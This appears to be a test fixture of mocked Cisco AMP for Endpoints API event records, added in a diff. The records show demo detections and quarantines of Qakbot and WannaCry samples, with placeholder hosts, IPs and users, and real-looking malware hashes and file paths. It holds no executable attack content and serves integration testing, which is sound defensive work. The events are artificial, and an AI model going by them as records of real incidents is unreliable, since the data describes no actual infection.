+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a 
worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 